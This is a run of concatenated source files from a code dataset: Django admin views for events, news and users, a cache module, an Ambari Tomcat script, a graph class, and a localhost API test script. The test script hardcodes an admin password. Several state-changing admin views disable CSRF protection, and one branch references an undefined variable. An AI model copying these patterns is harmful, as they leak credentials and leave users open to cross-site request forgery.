like_group=like)\n\t\t\telse:\n\t\t\t\tmaterial = Materials.objects.create(title=title, text=text, player=request.user, like_group=like)\n\t\t\t\n\t\t\ttry:\n\t\t\t\tgroup_id = EventsGroup.objects.get(id=group_id)\n\t\t\texcept ObjectDoesNotExist:\n\t\t\t\traise Http404\n\n\t\t\tevent = Event.objects.create(material=material, start_date = start_date, end_date = start_date, \n\t\t\t\t\tplace = place, is_completed=is_completed, event_group=group_id) \n\t\t\t\n\t\t\t\n\t\t\t# events_string = str(event_date.day).rjust(2, 
'0')+\".\"+str(event_date.month).rjust(2, '0')+\".\"+str(event_date.year)+u\" в \"+str(event_date.hour).rjust(2, '0')+\":\"+str(event_date.minute).rjust(2, '0')+u\" состоится '\" +event.get_title()+\"'\"\n\t\t\t# # push_data = {\"aps\":{\"alert\":events_string}}\n\t\t\t# # send_notifications(push_data)\n\t\t\tevent_date = event.get_start_date_time()\n\t\t\tevents_string = u\"Добавлено мероприятие. \\n\"+str(event_date.day).rjust(2, '0')+\".\"+str(event_date.month).rjust(2, '0')+\".\"+str(event_date.year)+u\" в \"+str(event_date.hour).rjust(2, '0')+\":\"+str(event_date.minute).rjust(2, '0')+u\" состоится '\" +event.get_title()+\"'\"\n\t\t\tn1 = push.Notification(events_string, data='{\"window_open\":\"2\"}')\n\t\t\tpush.push([n1])\n\n\t\t\treturn HttpResponseRedirect(\"/adminka/events/\")\n\t\telse:\n\t\t\tform.titlef = request.POST.get('title')\n\t\t\tform.start_datef = request.POST.get('start_date')\n\t\t\tform.placef = request.POST.get('place')\n\t\t\tform.textf = request.POST.get('text')\n\t\t\tform.is_completedf = request.POST.get('is_completed')\n\t\t\tif request.POST.get('group_id'):\n\t\t\t\tform.group_idf = int(request.POST.get('group_id'))\n\telse:\t\n\t\tform = EventForm()\n\tgroups = EventsGroup.objects.all()\n\treturn render_to_response(template_name, {\"form\":form, \"groups\":groups}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef remove_events(request, id):\n\ttry:\n\t\tevent = Event.objects.get(id=int(id))\n\t\tevent.is_removed = True\n\t\tevent.save()\n\t\treturn HttpResponseRedirect(\"/adminka/events/\")\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n\n@site_admin_only\ndef all_users(request, type_users, template_name='adminka/users/users.html'):\n\tif type_users == \"active\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_active=True)\n\telif type_users == \"noactive\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_active=False)\n\telif type_users == \"visible\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_visible=True)\n\telif type_users == \"novisible\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_visible=False)\n\telif type_users == \"online\":\n\t\t# uids = cache.get('online-now', [])\n\t # online_keys = ['online-%s' % (u,) for u in uids]\n\t # fresh = cache.get_many(online_keys).keys()\n\t # online_now_ids = [int(k.replace('online-', '')) for k in fresh]\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_visible=False).filter(id in online_now_ids)\n\telse:\n\t\tall_users = Player.objects.filter(is_active=True)\n\treturn render_to_response(template_name, {\"all_users\":all_users}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef user(request, id, template_name='adminka/users/user.html'):\n\ttry:\n\t\tplayer = Player.objects.get(id=int(id))\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n\treturn render_to_response(template_name, {\"player\":player}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef user_activity(request, id):\n\tif request.method == 'POST':\n\t\tform = ActivityForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\tstart_active = form.cleaned_data['start_active']\n\t\t\tend_active = form.cleaned_data['end_active']\n\t\t\tif start_active > end_active:\n\t\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":2})\n\t\t\telif start_active == end_active:\n\t\t\t\ttable_data = simplejson.dumps({\"status\": 
False, \"system_message\":3})\n\t\t\telif end_active < timezone.now():\n\t\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":4})\n\t\t\telse:\n\t\t\t\tuser = Player.objects.get(id=int(id))\n\t\t\t\tuser.life.start_active = start_active\n\t\t\t\tuser.life.end_active = end_active\n\t\t\t\tuser.life.user_active = True\n\t\t\t\tuser.life.save()\n\t\t\t\ttable_data = simplejson.dumps({\"status\": True, \"start_active\":str(start_active), \"end_active\":str(end_active)})\n\t\telse:\n\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":1})\n\n\t\treturn HttpResponse(table_data,'application/json')\n\telse:\n\t\traise Http404\n\n@csrf_exempt\n@site_admin_only\ndef user_visible(request, id):\n\tif request.method == 'POST':\n\t\ttry:\n\t\t\tuser = Player.objects.get(id=int(id))\n\t\t\tif user.life.user_visible:\n\t\t\t\tuser.life.user_visible = False\n\t\t\telse:\n\t\t\t\tuser.life.user_visible = True\n\t\t\tuser.life.save()\n\t\texcept ObjectDoesNotExist:\n\t\t\traise Http404\n\n\t\ttable_data = simplejson.dumps({\"status\": False})\n\t\treturn HttpResponse(table_data,'application/json')\n\telse:\n\t\traise Http404\n\n\n\n@site_admin_only\ndef all_news(request, template_name='adminka/news/news.html'):\n\tall_news = News.objects.filter(is_removed=False).order_by('-date_create')\n\treturn render_to_response(template_name, {\"all_news\":all_news}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef news_add(request, template_name='adminka/news/add.html'):\n\tif request.method == 'POST':\n\t\tform = NewsForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\n\t\t\tlike = MateriaLike.objects.create()\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tmaterial = Materials.objects.create(logo=logo, title=title, text=text, player=request.user, like_group=like)\n\t\t\telse:\n\t\t\t\tmaterial = Materials.objects.create(title=title, text=text, player=request.user, like_group=like)\n\t\t\t\n\t\t\tnews = News.objects.create(material=material) \n\t\t\t\n\t\t\t# import pyapns\n\t\t\t# pyapns.configure({'HOST': 'http://localhost:7077/'})\n\t\t\t# pyapns.provision('com.axbx.theriver', open('/home/srv/www/sert/apns-dev.pem').read(), 'sandbox')\n\t\t\t# message = {\"aps\":{\"alert\":\"test\"}}\n\t\t\t# pyapns.notify('com.axbx.theriver', \"0980caa5fbeb6f008f7edbec69bf533516737b4c21f9354e500672f59a47470a\", message)\n\n\t\t\tnews_string = u\"Добавлена новость. 
\\n\"+news.get_title()\n\n\t\t\tn1 = push.Notification(news_string, data='{\"window_open\":\"1\"}')\n\t\t\tpush.push([n1])\n\n\t\t\treturn HttpResponseRedirect(\"/adminka/news/\")\n\t\telse:\n\t\t\tform.titlef = request.POST.get('title')\n\t\t\tform.textf = request.POST.get('text')\n\telse:\t\n\t\tform = NewsForm()\n\treturn render_to_response(template_name, {\"form\":form}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef news(request, id, template_name='adminka/news/news_page.html'):\n\ttry:\n\t\tnews = News.objects.get(id=int(id), is_removed=False)\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = NewsForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tnews.material.logo = logo\n\n\t\t\tnews.material.title = title\n\t\t\tnews.material.text = text\n\t\t\tnews.date_create = datetime.datetime.now()\n\t\t\tnews.material.save()\n\t\t\tnews.save()\n\t\t\treturn HttpResponseRedirect(\"/adminka/news/\")\n\telse:\t\n\t\tform = NewsForm()\n\treturn render_to_response(template_name, {\"news\":news, \"form\":form}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef remove_news(request, id):\n\ttry:\n\t\tnews = News.objects.get(id=int(id))\n\t\tnews.is_removed = True\n\t\tnews.save()\n\t\treturn HttpResponseRedirect(\"/adminka/news/\")\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n\n@site_admin_only\ndef all_bd(request, template_name='adminka/bd/bd_list.html'):\n\tall_bd = KnowledgeBaseTheRiver.objects.filter(is_removed=False).order_by('-date_create')\n\treturn render_to_response(template_name, {\"all_bd\":all_bd}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef bd_add(request, template_name='adminka/bd/add.html'):\n\tif request.method == 'POST':\n\t\tform = BDForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\ttags_id = form.cleaned_data['tags_id']\n\n\t\t\tlike = MateriaLike.objects.create()\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tmaterial = Materials.objects.create(logo=logo, title=title, text=text, player=request.user, like_group=like)\n\t\t\telse:\n\t\t\t\tmaterial = Materials.objects.create(title=title, text=text, player=request.user, like_group=like)\n\t\t\t\n\t\t\tbd = KnowledgeBaseTheRiver.objects.create(material=material) \n\n\t\t\tif tags_id:\n\t\t\t\tbd.remove_all_tag()\n\t\t\t\ttags_id = tags_id.split(\",\")\n\n\t\t\t\tfor i_id in tags_id:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif i_id:\n\t\t\t\t\t\t\ttag = BD_Tag.objects.get(id=i_id)\n\t\t\t\t\t\t\tbd.tags.add(tag)\n\t\t\t\t\texcept ObjectDoesNotExist:\n\t\t\t\t\t\traise Http404\n\t\t\tbd.save()\n\t\t\tbd_string = u\"Добавлено новое знание. 
\\n\"+bd.get_title()\n\t\t\tn1 = push.Notification(bd_string, data='{\"window_open\":\"3\"}')\n\t\t\tpush.push([n1])\n\n\t\t\treturn HttpResponseRedirect(\"/adminka/bd/\")\n\t\telse:\n\t\t\tform.titlef = request.POST.get('title')\n\t\t\tform.textf = request.POST.get('text')\n\t\t\tform.tags_idf = request.POST.get('tags_id')\n\telse:\t\n\t\tform = BDForm()\n\treturn render_to_response(template_name, {\"form\":form}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef bd(request, id, template_name='adminka/bd/bd_page.html'):\n\ttry:\n\t\tbd = KnowledgeBaseTheRiver.objects.get(id=int(id), is_removed=False)\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = BDForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\ttags_id = form.cleaned_data['tags_id']\n\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tbd.material.logo = logo\t\t\t\n\n\t\t\tbd.material.title = title\n\t\t\tbd.material.text = text\n\t\t\tbd.date_create = datetime.datetime.now()\n\t\t\tbd.material.save()\n\t\t\tbd.save()\n\n\t\t\tif tags_id:\n\t\t\t\tbd.remove_all_tag()\n\t\t\t\ttags_id = tags_id.split(\",\")\n\n\t\t\t\tfor i_id in tags_id:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif i_id:\n\t\t\t\t\t\t\ttag = BD_Tag.objects.get(id=i_id)\n\t\t\t\t\t\t\tbd.tags.add(tag)\n\t\t\t\t\texcept ObjectDoesNotExist:\n\t\t\t\t\t\traise Http404\n\t\t\tbd.save()\n\t\t\treturn HttpResponseRedirect(\"/adminka/bd/\")\n\telse:\t\n\t\tform = BDForm()\n\treturn render_to_response(template_name, {\"form\":form, \"bd\":bd}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef remove_bd(request, id):\n\ttry:\n\t\tbd = KnowledgeBaseTheRiver.objects.get(id=int(id))\n\t\tbd.is_removed = True\n\t\tbd.save()\n\t\treturn HttpResponseRedirect(\"/adminka/bd/\")\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n@csrf_exempt\n@site_admin_only\ndef add_bd_tag(request):\n\ttry:\n\t\tplayer = request.user\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = AddTagForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\ttags = form.cleaned_data['tags'].strip()\n\t\t\ttry:\n\t\t\t\ttag = BD_Tag.objects.get(name__iexact=tags) \n\t\t\texcept ObjectDoesNotExist:\n\t\t\t\trating = Rating.objects.create(curent_value=0)\n\t\t\t\ttag = BD_Tag.objects.create(name=tags, rating=rating)\n\t\t\ttable_data = simplejson.dumps(\n\t\t\t\t{\n\t\t\t\t\t\"id\": tag.id, \"name\":tag.name\n\t\t\t\t}, ensure_ascii=False)\n\t\t\treturn HttpResponse(table_data,'application/json')\n\traise Http404\n\n\n#автозаполнение\n@csrf_exempt\n@site_admin_only\ndef autocomplete_bd_tag(request):\n if request.is_ajax():\n if request.method == 'POST':\n tag \t= request.POST.get('query')\n\n if tag:\n tags = BD_Tag.objects.filter(name__istartswith=tag).order_by('-rating')\n else:\n tags = BD_Tag.objects.all()\n\n tags = tags[:int(request.REQUEST.get('limit', 15))]\n table_data = simplejson.dumps(\n {\n \"query\": \"Unit\",\n \"suggestions\": [ {\"value\":tag.name, \"data\":tag.name} for tag in tags]\n }, ensure_ascii=False)\n return HttpResponse(table_data,'application/json')\n raise Http404","sub_path":"adminka/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"422219150","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('empleados/', views.empleados, name='empleados'),\n path('empleados/set', views.crearEmpleado, name='crearEmpleado'),\n path('cargos', views.cargos, name='cargos')\n]\n \n","sub_path":"semana5/dia2/pcapi/equipos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"595887668","text":"# -*- coding:utf-8 -*-\n\nimport six\nif six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n\nfrom api.extensions import cache\nfrom api.models.cmdb import Attribute\nfrom api.models.cmdb import CIType\nfrom api.models.cmdb import CITypeAttribute\nfrom api.models.cmdb import RelationType\n\n\nclass AttributeCache(object):\n @classmethod\n def get(cls, key):\n if key is None:\n return\n attr = cache.get('Field::Name::{0}'.format(key)) \\\n or cache.get('Field::ID::{0}'.format(key)) \\\n or cache.get('Field::Alias::{0}'.format(key))\n\n if attr is None:\n attr = Attribute.get_by(name=key, first=True, to_dict=False) \\\n or Attribute.get_by_id(key) \\\n or Attribute.get_by(alias=key, first=True, to_dict=False)\n if attr is not None:\n cls.set(attr)\n return attr\n\n @classmethod\n def set(cls, attr):\n cache.set('Field::ID::{0}'.format(attr.id), attr)\n cache.set('Field::Name::{0}'.format(attr.name), attr)\n cache.set('Field::Alias::{0}'.format(attr.alias), attr)\n\n @classmethod\n def clean(cls, attr):\n cache.delete('Field::ID::{0}'.format(attr.id))\n cache.delete('Field::Name::{0}'.format(attr.name))\n cache.delete('Field::Alias::{0}'.format(attr.alias))\n\n\nclass CITypeCache(object):\n @classmethod\n def get(cls, key):\n if key is None:\n return\n ct = cache.get(\"CIType::ID::{0}\".format(key)) or \\\n cache.get(\"CIType::Name::{0}\".format(key)) or \\\n cache.get(\"CIType::Alias::{0}\".format(key))\n if ct is None:\n ct = CIType.get_by(name=key, first=True, to_dict=False) or \\\n CIType.get_by_id(key) or \\\n CIType.get_by(alias=key, first=True, to_dict=False)\n if ct is not None:\n cls.set(ct)\n return ct\n\n @classmethod\n def set(cls, ct):\n cache.set(\"CIType::Name::{0}\".format(ct.name), ct)\n cache.set(\"CIType::ID::{0}\".format(ct.id), ct)\n cache.set(\"CIType::Alias::{0}\".format(ct.alias), ct)\n\n @classmethod\n def clean(cls, key):\n ct = cls.get(key)\n if ct is not None:\n cache.delete(\"CIType::Name::{0}\".format(ct.name))\n cache.delete(\"CIType::ID::{0}\".format(ct.id))\n cache.delete(\"CIType::Alias::{0}\".format(ct.alias))\n\n\nclass RelationTypeCache(object):\n @classmethod\n def get(cls, key):\n if key is None:\n return\n ct = cache.get(\"RelationType::ID::{0}\".format(key)) or \\\n cache.get(\"RelationType::Name::{0}\".format(key))\n if ct is None:\n ct = RelationType.get_by(name=key, first=True, to_dict=False) or RelationType.get_by_id(key)\n if ct is not None:\n cls.set(ct)\n return ct\n\n @classmethod\n def set(cls, ct):\n cache.set(\"RelationType::Name::{0}\".format(ct.name), ct)\n cache.set(\"RelationType::ID::{0}\".format(ct.id), ct)\n\n @classmethod\n def clean(cls, key):\n ct = cls.get(key)\n if ct is not None:\n cache.delete(\"RelationType::Name::{0}\".format(ct.name))\n cache.delete(\"RelationType::ID::{0}\".format(ct.id))\n\n\nclass CITypeAttributeCache(object):\n \"\"\"\n key is type_id or type_name\n \"\"\"\n\n @classmethod\n def get(cls, key):\n if key is None:\n return\n\n attrs = 
cache.get(\"CITypeAttribute::Name::{0}\".format(key)) \\\n or cache.get(\"CITypeAttribute::ID::{0}\".format(key))\n if not attrs:\n attrs = CITypeAttribute.get_by(type_id=key, to_dict=False)\n if not attrs:\n ci_type = CIType.get_by(name=key, first=True, to_dict=False)\n if ci_type is not None:\n attrs = CITypeAttribute.get_by(type_id=ci_type.id, to_dict=False)\n if attrs is not None:\n cls.set(key, attrs)\n return attrs\n\n @classmethod\n def set(cls, key, values):\n ci_type = CITypeCache.get(key)\n if ci_type is not None:\n cache.set(\"CITypeAttribute::ID::{0}\".format(ci_type.id), values)\n cache.set(\"CITypeAttribute::Name::{0}\".format(ci_type.name), values)\n\n @classmethod\n def clean(cls, key):\n ci_type = CITypeCache.get(key)\n attrs = cls.get(key)\n if attrs is not None and ci_type:\n cache.delete(\"CITypeAttribute::ID::{0}\".format(ci_type.id))\n cache.delete(\"CITypeAttribute::Name::{0}\".format(ci_type.name))\n","sub_path":"api/lib/cmdb/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"165434399","text":"import requests\nimport os\nimport json\n\n\n#check if API is working\ntest_response = requests.get('http://localhost:5090/api/test')\nprint(test_response.json())\n#Get token with admin auth\ntoken_response = requests.get('http://localhost:5090/api/tokens', auth=('admin', 'caMx2mwuGeWA'))\nprint(token_response.json())\ntoken_json = token_response.json()\ntoken = token_response.json()['token']\nprint(token)\n#add token to headers\nheaders = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token}\n# get BP with test_upw\ntest_upw_data_file_path = os.getcwd() + '/data.json'\nwith open(test_upw_data_file_path, 'r') as data_file:\n data = json.load(data_file)\n print(data)\n get_bp_response = requests.get('http://localhost:5090/api/get_bp', headers=headers, json=data)\n print(get_bp_response.json())\n\n#create new database\n#check for db_list\ndb_list_response = requests.get('http://localhost:5090/api/databases', headers=headers)\nprint(db_list_response.json())\ndb_json = {\"db_name\": \"123\"}\ncreate_db_response = requests.put('http://localhost:5090/api/databases', headers=headers, json=db_json)\n#check for new db in list\ndb_list_response = requests.get('http://localhost:5090/api/databases', headers=headers)\nprint(db_list_response.json())\n#delete new db from list\ndb_list_response = requests.delete('http://localhost:5090/api/databases', headers=headers, json=db_json)\nprint(db_list_response.json())\n#check for new db not in list\ndb_list_response = requests.get('http://localhost:5090/api/databases', headers=headers)\nprint(db_list_response.json())\n\n#check for upw_list from db 4994\ndb_json_4994 = {\"db_name\": \"4994\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json_4994)\nprint(upw_list_response.json())\n#get with upw_arrays\ndb_json_4994 = {\"db_name\": \"5391\", \"upw_arrays\": \"get_upw_arrays\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json_4994)\nprint(upw_list_response.json())\n#try to get upws from non existed db\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n#try to get upws from non existed db with upw_arrays\ndb_json = {\"db_name\": \"123\", \"upw_arrays\": \"get_upw_arrays\"}\nupw_list_response = 
requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n\n#work with upw in database 4994\nupw_json_4994 = {\"db_name\": \"4994\", \"cid\": \"47529\"}\nupw_list_response = requests.get('http://localhost:5090/api/upw', headers=headers, json=upw_json_4994)\nprint(upw_list_response.json())\n#put new upw in database\nupw_file_path = os.getcwd() + '/data2.json'\nwith open(upw_file_path, 'r') as upw_file:\n upw_json = json.load(upw_file)\n upw_list_response = requests.put('http://localhost:5090/api/upw', headers=headers, json=upw_json)\n print(upw_list_response.json())\n#Check upw added\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n#delete added upw\ndelete_upw_json = {\"db_name\": \"123\", \"cid\": \"1\"}\nupw_list_response = requests.delete('http://localhost:5090/api/upw', headers=headers, json=delete_upw_json)\nprint(upw_list_response.json())\n#Check upw deleted\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n\n#revoke token\nupw_list_response = requests.delete('http://localhost:5090/api/tokens', headers=headers)\nprint(upw_list_response.content)\n\n#try to use API after revoke\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n","sub_path":"app/tests/token_api_test.py","file_name":"token_api_test.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92853244","text":"\"\"\"\nビュークラス\nV080_TaskDetail\nトップページ用View\nエラーフラグ:0(正常終了),1(業務エラー),2(システムエラー)\nflg_return:0(render),1(redirect)\n\nflg_return==0の時、「template」「context」必須\nflg_return==1の時、「path_name」必須\n\n\"\"\"\n\nfrom django.urls import reverse\nfrom . 
import (C010_Const,C030_MessageUtil,\n S006_GetKeibaNews,\n S130_SelectTask,\n S900_SelectHanyoMst,\n)\n\ndef main(request,urlID,seq):\n #--View共通----------------------------------------------\n #戻り値用の変数宣言\n flg_return = \"\"\n template = ''\n context = {}\n path_name = ''\n #-------------------------------------------------------\n try:\n if request.method == 'POST':\n #POSTの場合\n \"\"\"\n POST時の処理を書く。\n パターンに応じてflg_returnの値を設定する。\n bottunパターンによって処理を分けたりもするかも。\n 例は、redirect\n \"\"\"\n flg_return = \"1\"\n path_name = C010_Const.APP_NAME_DEFAULT + ':topPage'\n else:\n #POST以外の場合\n \"\"\"\n POST以外時の処理を書く。\n パターンに応じてflg_returnの値を設定する。\n bottunパターンによって処理を分けたりもするかも。\n 例は、render\n \"\"\"\n #サービスを利用する場合は呼び出す\n #プロジェクト情報を取得する\n projectID = request.session[\"projectID\"]\n\n #プロジェクトに紐づくタスクの一覧を取得する\n #--S140-------------------------------------------------------------------------\n #サービス呼び出し\n json_S130 = S130_SelectTask.main(projectID,seq)\n #個々の値を取得\n flg_S130 = json_S130[\"json_CommonInfo\"][\"errflg\"]\n list_msgInfo_S130 = json_S130[\"json_CommonInfo\"][\"list_msgInfo\"]\n json_taskInfo_S130 = json_S130[\"json_taskInfo\"]\n #メッセージ格納\n C030_MessageUtil.setMessageList(request,list_msgInfo_S130)\n #-------------------------------------------------------------------------------\n\n #date型の型変換\n kignDate = json_taskInfo_S130[\"KIGN_DATE\"]\n json_taskInfo_S130[\"KIGN_DATE\"] = format(kignDate, '%Y-%m-%d')\n\n #--S006-------------------------------------------------------------------------\n #サービス呼び出し\n #最新ニュース取得\n json_keibaInfo = S006_GetKeibaNews.main(0)\n #ドロップダウンの値取得\n tuple_status = S900_SelectHanyoMst.main(\"SEC0001\",None)[\"tuple_M101_hanyoMst\"]\n #-------------------------------------------------------------------------------\n\n #戻り値にセット\n flg_return = \"0\"\n template = C010_Const.APP_NAME_DEFAULT + '/T080_TaskDetail.html'\n context = {**context,**{\n \"json_taskInfo_S130\":json_taskInfo_S130,\n \"json_keibaInfo\":json_keibaInfo,\n \"tuple_status\":tuple_status\n }\n }\n \n #戻り値用のjsonを作成\n json_view = {'flg_return':flg_return, 'template':template, 'context':context, 'path_name':path_name}\n return json_view\n #==例外処理==========================================================================================\n except Exception as e :\n #システムエラー共通処理\n C030_MessageUtil.systemErrorCommonMethod()\n raise\n #====================================================================================================\n\n","sub_path":"app001_projectManagement/process/V080_TaskDetail.py","file_name":"V080_TaskDetail.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"449101867","text":"#!/usr/bin/env python\n\"\"\"\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. 
You may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\n\"\"\"\n\nimport sys\nfrom resource_management import *\n\nclass Tomcat(Script):\n  def install(self, env):\n    self.install_packages(env)\n    pass\n\n  def configure(self, env):\n    import params\n    env.set_params(params)\n\n  def start(self, env):\n    import params\n    self.configure(env)\n    tomcat_pid = format('{app_root}/catalina.pid')\n    process_cmd = format('env JAVA_HOME={java64_home} CATALINA_PID=' + tomcat_pid + ' {app_root}/apache-tomcat-*/bin/catalina.sh start')\n\n    Execute(process_cmd,\n            logoutput=False,\n            wait_for_finish=True,\n            pid_file=tomcat_pid,\n            poll_after = 15\n    )\n\n  def stop(self, env):\n    import params\n    self.configure(env)\n    tomcat_pid = format('{app_root}/catalina.pid')\n    process_cmd = format('env JAVA_HOME={java64_home} CATALINA_PID=' + tomcat_pid + ' {app_root}/apache-tomcat-*/bin/catalina.sh stop')\n\n    Execute(process_cmd,\n            logoutput=True,\n            wait_for_finish=True,\n            pid_file=tomcat_pid,\n            poll_after = 15\n    )\n\n  def status(self, env):\n    import params\n    self.configure(env)\n    tomcat_pid = format('{app_root}/catalina.pid')\n    check_process_status(tomcat_pid)\n\nif __name__ == \"__main__\":\n  Tomcat().execute()\n","sub_path":"package/scripts/tomcat.py","file_name":"tomcat.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"289038230","text":"'''\r\nCreated on Jun 30, 2017\r\n\r\n@author: Rawad\r\n'''\r\n\r\nclass Graph:\r\n\t'''\r\n\tUses an adjacency list representation to represent an undirected graph.\r\n\t'''\r\n\t\r\n\tdef __init__(self):\r\n\t\tself.graph = {}\r\n\t\r\n\tdef addGroup(self, a, b):\r\n\t\t\r\n\t\tif not a in self.graph:\r\n\t\t\tself.graph[a] = []\r\n\t\t\r\n\t\tif not b in self.graph:\r\n\t\t\tself.graph[b] = []\r\n\t\t\r\n\t\tif not a in self.graph[b]:\r\n\t\t\tself.graph[b].append(a)\r\n\t\t\r\n\t\tif not b in self.graph[a]:\r\n\t\t\tself.graph[a].append(b)\r\n\t\r\n\tdef __len__(self):\r\n\t\treturn len(self.graph)\r\n\t\r\n\tdef isCyclic(self):\r\n\t\t\r\n\t\tvisited = {i: False for i in self.graph}\r\n\t\t\r\n\t\tfor v in self.graph:\r\n\t\t\tif not visited[v]:\r\n\t\t\t\tif self.isCyclicUtil(visited, v, -1):\r\n\t\t\t\t\treturn True\r\n\t\t\t\t\r\n\t\t\r\n\t\treturn False\r\n\t\r\n\tdef isCyclicUtil(self, visited, v, parent):\r\n\t\t\r\n\t\tvisited[v] = True\r\n\t\t\r\n\t\tfor u in self.graph[v]:\r\n\t\t\tif not visited[u]:\r\n\t\t\t\tif self.isCyclicUtil(visited, u, v):\r\n\t\t\t\t\treturn True\r\n\t\t\telif parent != u:\r\n\t\t\t\treturn True\r\n\t\t\t\t\r\n\t\treturn False\r\n\t\r\n\tdef getConnectedComponents(self):\r\n\t\t'''\r\n\t\tReturns a list of graphs, each representing a connected component contained in the original graph.\r\n\t\t'''\r\n\t\t\r\n\t\tvisited = {i: False for i in self.graph}\r\n\t\t\r\n\t\tgraphs = []\r\n\t\t\r\n\t\tfor v in self.graph:\r\n\t\t\tif not visited[v]:\r\n\t\t\t\tgraph = Graph()\r\n\t\t\t\tgraphs.append(graph)\r\n\t\t\t\tself.connectedComponentsUtil(v, visited, graph)\r\n\t\t\r\n\t\treturn graphs\r\n\t\r\n\tdef connectedComponentsUtil(self, v, visited, graph):\r\n\t\t\r\n\t\tvisited[v] = True\r\n\t\t\r\n\t\tfor u in 
